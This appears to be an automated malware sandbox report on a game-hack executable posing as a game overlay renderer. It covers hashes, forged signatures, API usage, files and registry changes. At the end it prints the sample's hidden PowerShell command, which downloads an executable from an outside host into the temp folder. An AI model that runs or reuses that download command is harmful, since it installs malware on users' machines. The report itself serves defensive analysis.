PUP.Gamehack.GSO

Analysis Report

General information

Family Name: PUP.Gamehack.GSO
Signature status: Hash Mismatch

Known Samples

MD5: a7668609025ed001fad36544c0d4a50a
SHA1: 29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256: 75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size: 749.06 KB, 749056 bytes

MD5: 611362bc4aa194c52db4c95555d2b2b8
SHA1: bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256: 5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size: 9.64 MB, 9637552 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has TLS information
  • File is 64-bit executable
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Company Name: Minkio Software
File Description: Game Overlay Renderer
File Version: 1.4.2.0
Internal Name: MinkioOverlay
Legal Copyright: Copyright (C) 2025 Minkio Software
Original Filename: MinkioExternal.exe
Product Name: Minkio Overlay
Product Version: 1.4.2

Digital Signatures

Signer | Root | Status
Areeb Ahmed Code Signing LLC | Areeb Ahmed Code Signing LLC | Self Signed
Microsoft Corporation | Microsoft Code Signing PCA 2011 | Hash Mismatch
Microsoft Windows Software Compatibility Publisher | Microsoft Windows Third Party Component CA 2013 | Hash Mismatch

File Traits

  • dll
  • HighEntropy
  • imgui
  • ntdll
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 22,702
Potentially Malicious Blocks: 1,611
Whitelisted Blocks: 17,442
Unknown Blocks: 3,649

Visual Map

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File | Attributes
\device\namedpipe\gmdasllogger | Generic Write, Read Attributes
\device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell | Generic Read, Write Data, Write Attributes, Write extended, Append data, LEFT 524288
c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1 | Generic Write, Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1 | Generic Write, Read Attributes

Registry Modifications

Key::Value | Data | API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | | RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | | RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe | | RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | | RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueryWnfStateNameInformation
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSetSystemInformation
  • ntdll.dll!NtSetTimer2
  • ntdll.dll!NtSetTimerEx
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTerminateProcess

15 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
